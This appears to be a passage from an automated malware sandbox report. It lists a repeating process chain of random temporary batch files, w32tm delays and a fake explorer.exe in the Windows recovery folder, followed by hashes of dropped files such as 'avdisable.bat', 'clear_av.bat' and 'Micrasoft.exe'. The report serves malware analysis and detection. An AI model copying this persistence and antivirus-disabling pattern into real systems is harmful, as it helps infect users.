"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Recovery\WindowsRE\explorer.exe

"C:\Recovery\WindowsRE\explorer.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/4756-0-0x00007FFA85573000-0x00007FFA85574000-memory.dmp

memory/4756-1-0x0000000000160000-0x000000000034C000-memory.dmp

memory/4756-4-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe

MD5 4eab8d478ffd36a7d96ca9a8512cc447
SHA1 cddb1b2d3656d62cdcc67125ec29f2bf83c5f346
SHA256 a2701733d9e6d3b518072810c779b25dd7ddd683fe36196e259a551acbc1e16a
SHA512 c5dec11ecb61486b87d26f34e90e1107562186ed16c7d9b77d2e7b47456917f2aafc2c61b6b78472a8eeaa84a93a52192c300cf79220bbe8bcc9c080db1e36d6

memory/4756-19-0x00007FFA85570000-0x00007FFA85F5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FunChecker .bat

MD5 42afdea7c75bc9074a22ff1be2787959
SHA1 24bc20691a1e99e2cf0b2bca78694701fa47720a
SHA256 3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512 d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

C:\Users\Admin\AppData\Local\Temp\avdisable.bat

MD5 4c35b71d2d89c8e8eb773854085c56ea
SHA1 ede16731e61348432c85ef13df4beb2be8096d9b
SHA256 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42
SHA512 a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d

C:\Users\Admin\AppData\Local\Temp\clear_av.bat

MD5 48d1db006fe2ae378b0f7efd561d7e56
SHA1 63df10216f0ad81d1d42dd2fc8c4483be5d077fc
SHA256 65428112138dff324acd39babd902959dbb78b6ed74a276a1d3c9993ae52847a
SHA512 079fa75df35b8fea18fb220b3f005d6384b28aedb2e5ae62ddd3f6db6abda7dbab091fd44d05dffb4ec41657e052f379267eef7c5126fd8bd7eb189f147806f5

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe

MD5 9a1c593488c39a17105a4ea268b40a0e
SHA1 90f73ef3dd6c79442f27f481957e60f0deaa3ab4
SHA256 9158f324d6e13bef490aa65d1a88faf7a86ea8f5672a169a1bebcbe6b84bf7b5
SHA512 a955caffe8bd4b697afadaf18f7bb34fe17c1fc7555708a0bff792c301c9b40ebdc680b0e8c50219ea37b23cf3b154f041ec57c549979d3b8f9546b269cdd67d

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat

MD5 773bdbbe3e641a349d737adddf1223c0
SHA1 682e313b914460eefe3e2cb7a09beeacd461c108
SHA256 606a9b2fe5108baa4a87284abaa58179f02cb4df332e81bf866351b66a04643a
SHA512 0f2a2ac17804b254d91dee3ebba42df3630ffef674ec72102310ed76c9adaa874abb02d7a674183838da8951428a2d8504f6717279fd725be6002565017154a4

C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe

MD5 1876c5d2f6209c7ca5db2b568ec8dc47
SHA1 6bc2ed6ef3bfff6ac95ddeba230634520ea4fe33
SHA256 e580bbab6157f88c10d75fdbf17ac4d971e60d6e81982da6e78dfb28af58a755
SHA512 b2f2a38154cbf531ab5e47c6e310ca2de4a5365055115af2ee5e08a3d2ac1c21db6b964f0b36c69ffe0164b7dafb2552a9bc6ac6a2846247f58564c9a834cf94

memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp

memory/4944-37-0x000000001B7A0000-0x000000001B7BC000-memory.dmp

memory/4944-38-0x000000001BF30000-0x000000001BF80000-memory.dmp

memory/4944-39-0x000000001B7C0000-0x000000001B7D6000-memory.dmp

memory/4944-40-0x000000001BF80000-0x000000001BFD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat

MD5 b71d3786aee14d515a6f5a7deb4c5fd1
SHA1 3227e8f7dc07aa57f7caa246ae5f289e063aad74
SHA256 c9509ef6f7e57ad296f1c442fd538353b4f6f96d212856504891535f7b889569
SHA512 7a39593090fa20ffdcf288ddb636425e6f4dad0154a5ba55e92f4d3d3f9be45898f80b5a1220dcf051066278329b9108283e2785866cba0a608351191b0964db

memory/4048-86-0x000000001B5F0000-0x000000001B646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat

MD5 0435f0a3516c1543429468ac78260aa5
SHA1 0c791250982f563724d347aea6b40edd3aaa1070
SHA256 0ebac18fe2b35bf9c7505c49204a16c399cf8b9a5875ccbb9d601252117253af
SHA512 0fc492e72663b94af2267cabd3919ae865e3e1b98a8ab060a3a76e4623abf9070284e59cdded178c4555ea0cea1b485e92402a3a22da2dfb0ddf122c02e27d41

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

MD5 b20a84a0d572356548413fcf7e1c8ff1
SHA1 b02347fd036ce5c9df0cac4f8898e25c1bcef9b6
SHA256 9d2be47e92371e5abe5f070cce2cfeaed2018f85ff7b8f22849e9088e74df971
SHA512 d03b545a0bfcc79c1bd11f46bbec09e6cfa1159bd9b70fd297c3c847f7a397200d376098a486f23bab37fd487edff683fc0f798844d363ba41d2ae4cc7d02cef

C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat

MD5 d7ca49989aa6b1e8d5de9f553a9370c0
SHA1 73f3c05266d89e992057923197cf0f53251330da
SHA256 6566426a59b10f212938b9f268db906c0a0235f5acfb92c3f9ca25dfa3634e2f
SHA512 cc75cd31c7ebde22ece42c4dc15e8a10ce90bbdbe3946df1db83087de3a13a725bc952db582f71219423409f94fa16f7d62234ddf36946cb2d1c9923da07a5b0

C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat

MD5 3fac2909521a97a0721dd45b153fbf5d
SHA1 81e4aa7d209f6595dfd964d26991e5359b498d2b
SHA256 95e21f2b0339463e2b8c134819a370e1c0495142c8258b3c5c931f7bbecacd12
SHA512 6eebd64fec761ef5c51815b9918ea3ef139ae208af8bdb5eab30cb5dcbe064e4a9c9e8c4bf307f75f4b28861fb6afb3a35fdc9b66a224753938b0bdce611fb3f

C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat

MD5 02b40fab1f395c3dc558d404b3ef931b
SHA1 7c9ca81c91c7682c65d75d6030c9fbb117c4cf89
SHA256 80f1b050fa0e354f71589db99fd1ecb103b8a26976cdd5ccd83b86858896d32d
SHA512 ac8bb06ec498df876a415d7bf54234618c4f8c6f6489ab6620907aac399fcb544954ac13f2550e4eb2cffce18302d7fac8d398821c1942d85b33fc350c1c420a

C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat

MD5 e0d42a5447e75ec041cb9f5bffdaf4ec
SHA1 9a02ddf22749385d353da630aae1f6a2863afdfd
SHA256 6fd5cc8a902f1a481ce482a2ceedfb33cfb85ba3e8948917a39d4be3a7e8d4de
SHA512 fe1312dd3f741d406ffa5af0fff7177d3c6f102abde6c6d44c8e9b6391eb6f7cdf427c807b868629f174c57ea0c3435aa6f165d465dd9723ba5d5bf05fcc3ce4

C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat

MD5 a3ae517f38ae79a6d2fa73fc344ba68b
SHA1 2dfbced5bfc7b87bb13039e49e6b64a8408269d9
SHA256 74ed08dbf8034f799d14c2b004a190f32941f89d783ab0152fc966a357a8eb03
SHA512 940ba818bf6843197ee717415fc5c07b91783bf28b8698f7d83cef288376f49bfcc88b4bb052d7694b0270cc68bb1be6bfec8b2d1a08f0dfa6f6217053f3fd69

C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat

MD5 be03b65ee5a586260742d5b400f490e2
SHA1 57e1ab3579f64161d8508accc87e5bd9b976153d
SHA256 d4e1701bf6176359dd42a525175d2c7b8e4006c0884ba27e84deed78e563e438
SHA512 f1daebf1f0c00d6ae49a22a8ec5ae01a29cf753a293072a79dff47f222f3e30548ff03262d7bdc23cf3852dfc41585a3c6f7aeb315d2cb5e3d16484135f9c5c8

memory/4392-131-0x000000001AE50000-0x000000001AEA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat

MD5 d8f8f8c9c8942de946d54d40f2527d8a
SHA1 12a54720941c0a254287dca70a33acf71ca255d6
SHA256 92c965155ed8622a699507a199d1eaa2eefe6b55a432442f17588564406cb8c4
SHA512 79fef5609b70950a5d4d23b5ec8d94526ef264db28fb394d240f9e5e5747e4436f8e2f8a5064abc374afc8171d0c4a0a286293417d0588d92aa9e72921f87e3f

C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat

MD5 06b539d6a9da2069b07f06d56b78fad8
SHA1 ecfae9d7a5be859895d36c93e309d602f14cacab
SHA256 6e1f316f5653129958a8a7165c8011dfa07b88dd0de1296e4cf2d55b213990ba
SHA512 05706f934d4c3a09fe249b7dcd803fd72a315c3cbb86080cb914777d917364b4ebcc3cc0cbc92c57b275690e784259b55dd4d3ba1dbd805a23855a76626fda84

C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat

MD5 951d9e2b6bb6c2226bde8b7aa2d81f1e
SHA1 4430d5e127113b81c8ac11b49a1cab50307f20c1
SHA256 402f98979d38d51bc76d7d74e375adb1d71ee5b262c1f047147911367f0914eb
SHA512 e14c67adad4656043896f6a7a2d1d52112f9b1641dc2042de67497dfa76e53e68d3767995826ab942e8eeebdef47c51652958da15b3365cd13b0e8ae5799a3d5

memory/976-150-0x00000000026E0000-0x0000000002736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat

MD5 1cfcd21b46dc76c86039c4f9e05b01ff
SHA1 d81134539a21060e9a45b8f9bc5fe19294a4f273
SHA256 1acd3d9ac601d0953a834ac5ef3e51f50e02c0e1506e8a88cee39f1acc9d735d
SHA512 0bf710dc09f82e2458340ee14e60fd6fa19e04cb02e3b7d77b48159b0fd284e2bae2d90b07de3608730a62c6dfbe850e9eb75eb111d8555f99ea9313a861d3e3

C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat

MD5 f1390db6b412922820ad36f6f6ceae6f
SHA1 11310a88338f79cf374a9a12251579f8e6daf3b9
SHA256 7ddb6b8d9ea03c8352ffbf81dcae1bfa5ce3e3acbf860f4c229af610e1189605
SHA512 98b734048e74b308422df1f306fbfa2bc0118c94d6481d93ec35e9d0d2a4c48226038dbc35501e38c21fc105ff6442c2795a769a43fc6775ad48b671c07974c2

C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat

MD5 a057be178907b374ad8793ca7aa478be
SHA1 029c1e9f31008d34d59c6bbbc3c79ba5178e7cf7
SHA256 581702742101391ac48b2b26a2eaa6199990934b84abfe070fba5bfebed04bba
SHA512 fa72c3ccb46814e03e34796361a115a4d09b5e0278a6e16667a3d8bc392f667da69e0aee4332d1cfd89d525a3abfd089cb6987a0eb36d041ef12d11d3650a4a6

C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat

MD5 272139a27f07bb75d4c922cbc0e3ff22
SHA1 019c69a8fa94f6c579c6060bb61b4c7cd2a72b3e
SHA256 4f5c77dd5a2106057357e6537fec7659d32fdd1105d4ffef38b00179ce581f21
SHA512 26b968f6e2d7fae6f987d20c5308914dc287a240345d88dbd6df77f555f82e21cf7ab392d3d47a290a2a733e5f0032dff64f9c1c3e01b2e630120ef2935b84b8

C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat

MD5 08118e5e801f5c7cdef6c485a0aa71fa
SHA1 5956d7854460eaaf67caed2248ffda9f90e5e6f8
SHA256 5c718a423c0c22888c6a78f88bca9ad5e0ebe3f617c4ba6f068e9f26aa8a95c2
SHA512 129d141a43aabd2bffc244ab14fb708db57718477ac108080cc98849cdcc9f73572b06017c3cedde64b0ad2f302eb1ac3cfcfee5403a29fc4201b77ca1ceb8a9

C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat

MD5 3f0b8273509b654656b5e309a566eb73
SHA1 f7e750d2d5e2e2b862cae8c42293291a894cd3a6
SHA256 13ae5d3c2bff65076c6c478d351e488e92660f28678396b3457bed06123e3690
SHA512 829e48848e980fc0373e2de28252ad2cfcc15646faae359a51aae1920ca5b6e82b59378548a31fef8e1ae58acc1641b8245ab46708a413ad18b3962fc1c08967

C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat

MD5 f0ae2666fc43456f88f15513663ce68d
SHA1 753412eee83a6a70d1d503023d0b051a62e92f01
SHA256 98ba103a8ef13c9abb787036e3f939d5fbdda6a7e6e8ef97484db907446f94ff
SHA512 a6a30abea4ab0382aa90ff6eb4a18295142661ce274c26f41c6c16a6ed876e3339e93b9bc65a21a44618333b86d9ccc2dd2a20a5b5e5605f26c77967e2ab299f

C:\Users\Admin\AppData\Local\Temp\CPhDZIwY3l.bat

MD5 0c68b8bf8541d2ba1156d3e2906f0dc1
SHA1 bca847270732e07d016980a9946f23d300c1813d
SHA256 1370e0d250e1aede938f94c4fad64aab114b30b025d3a3ef71dd37c264c63bc1
SHA512 d18b9fa4428e82d6f6ed55edd6d70acc61095fe20d124b4940941c8a42cf9b3c1c85b73cd1b74e37d72086e76b678287d206e592e4e0417cf969f3c180518288

C:\Users\Admin\AppData\Local\Temp\niOj6yjqzp.bat

MD5 f7d195b72a33e0acb208d55917daf1aa
SHA1 40cfc7f75d250cd10f9cb4c5fcb03d4d80ab55f2
SHA256 40623d8113d02447ce8d7689cc27e918fbc0012fbdb18eb90c0dcc2f147002a1
SHA512 ed1ba77376fabe62992b674c3bc449fce18ab89834d12bfbd47768cfef88402ff2a3457171e31066960b038d7e0bced538fc6069aa56f2485b2ccb9f35590bf4

C:\Users\Admin\AppData\Local\Temp\OvjOVLkpjd.bat

MD5 6e6602b0cb6bb85722b6a40cbb06d055
SHA1 6c385ce1d0d75957c8b5ddc6e39804fe21fc4f0f
SHA256 15ee8c5a463d7a2e122025568088b508510289196ea9f850aa7191401b5d9ba9
SHA512 292ee848dae3ff701e2f00170b63027b9a7e7a9590f1999bb730c070a570aa528909d4dd14ff8fa6d4455743c8be7c97feb05b55918fb9ddf053fbed1b4396d5